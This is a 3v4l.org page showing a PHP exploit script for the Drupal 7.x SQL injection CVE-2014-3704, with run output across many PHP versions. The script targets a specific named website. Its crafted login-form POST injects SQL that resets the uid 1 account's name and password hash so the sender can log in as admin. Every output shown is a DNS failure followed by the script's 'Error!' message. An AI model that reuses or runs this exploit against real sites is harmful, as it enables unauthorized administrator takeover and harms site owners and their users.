3v4l.org

run code in 300+ PHP versions simultaneously
<?php #-----------------------------------------------------------------------------# # Exploit Title: Drupal core 7.x - SQL Injection # # Date: Oct 16 2014 # # Exploit Author: Dustin Dörr # # Software Link: http://www.drupal.com/ # # Version: Drupal core 7.x versions prior to 7.32 # # CVE: CVE-2014-3704 # #-----------------------------------------------------------------------------# $url = 'http://www.jnjbrasil.com.br/'; $post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; $params = array( 'http' => array( 'method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'content' => $post_data ) ); $ctx = stream_context_create($params); $data = file_get_contents($url . '?q=node&destination=node', null, $ctx); if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { echo "Success! Log in with username admin and password admin at {$url}user/login"; } else { echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; }
Output for 8.1.0 - 8.1.27, 8.2.0 - 8.2.17, 8.3.0 - 8.3.4
Deprecated: file_get_contents(): Passing null to parameter #2 ($use_include_path) of type bool is deprecated in /in/Q6jna on line 22 Warning: file_get_contents(): php_network_getaddresses: getaddrinfo for www.jnjbrasil.com.br failed: System error in /in/Q6jna on line 22 Warning: file_get_contents(http://www.jnjbrasil.com.br/?q=node&destination=node): Failed to open stream: php_network_getaddresses: getaddrinfo for www.jnjbrasil.com.br failed: System error in /in/Q6jna on line 22 Error! Either the website isn't vulnerable, or your Internet isn't working.
Output for 8.0.13 - 8.0.30
Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: System error in /in/Q6jna on line 22 Warning: file_get_contents(http://www.jnjbrasil.com.br/?q=node&destination=node): Failed to open stream: php_network_getaddresses: getaddrinfo failed: System error in /in/Q6jna on line 22 Error! Either the website isn't vulnerable, or your Internet isn't working.
Output for 8.0.0 - 8.0.12
Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /in/Q6jna on line 22 Warning: file_get_contents(http://www.jnjbrasil.com.br/?q=node&destination=node): Failed to open stream: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /in/Q6jna on line 22 Error! Either the website isn't vulnerable, or your Internet isn't working.
Output for 5.4.0 - 5.4.45, 5.5.0 - 5.5.38, 5.6.0 - 5.6.40, 7.0.0 - 7.0.33, 7.1.0 - 7.1.33, 7.2.0 - 7.2.26, 7.3.0 - 7.3.13, 7.3.32 - 7.3.33, 7.4.0 - 7.4.1, 7.4.26 - 7.4.33
Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: System error in /in/Q6jna on line 22 Warning: file_get_contents(http://www.jnjbrasil.com.br/?q=node&destination=node): failed to open stream: php_network_getaddresses: getaddrinfo failed: System error in /in/Q6jna on line 22 Error! Either the website isn't vulnerable, or your Internet isn't working.
Output for 7.2.29 - 7.2.33, 7.3.16 - 7.3.31, 7.4.3 - 7.4.25
Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /in/Q6jna on line 22 Warning: file_get_contents(http://www.jnjbrasil.com.br/?q=node&destination=node): failed to open stream: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /in/Q6jna on line 22 Error! Either the website isn't vulnerable, or your Internet isn't working.
Output for 5.2.6 - 5.2.17, 5.3.0 - 5.3.29
Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /in/Q6jna on line 22 Warning: file_get_contents(http://www.jnjbrasil.com.br/?q=node&destination=node): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /in/Q6jna on line 22 Error! Either the website isn't vulnerable, or your Internet isn't working.
Output for 5.0.3 - 5.0.5, 5.1.0 - 5.1.6, 5.2.0 - 5.2.5
Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /in/Q6jna on line 22 Warning: file_get_contents(http://www.jnjbrasil.com.br/?q=node&destination=node): failed to open stream: Connection refused in /in/Q6jna on line 22 Error! Either the website isn't vulnerable, or your Internet isn't working.
Output for 5.0.1 - 5.0.2
Warning: file_get_contents(): php_network_getaddresses: gethostbyname failed in /in/Q6jna on line 22 Warning: file_get_contents(http://www.jnjbrasil.com.br/?q=node&destination=node): failed to open stream: Success in /in/Q6jna on line 22 Error! Either the website isn't vulnerable, or your Internet isn't working.
Output for 5.0.0
Warning: file_get_contents(): php_network_getaddresses: gethostbyname failed in /in/Q6jna on line 22 Warning: file_get_contents(http://www.jnjbrasil.com.br/?q=node&destination=node): failed to open stream: Bad file descriptor in /in/Q6jna on line 22 Error! Either the website isn't vulnerable, or your Internet isn't working.
Output for 4.3.0 - 4.3.11, 4.4.0 - 4.4.9
Warning: file_get_contents() expects at most 2 parameters, 3 given in /in/Q6jna on line 22 Error! Either the website isn't vulnerable, or your Internet isn't working.

preferences:
312.83 ms | 402 KiB | 455 Q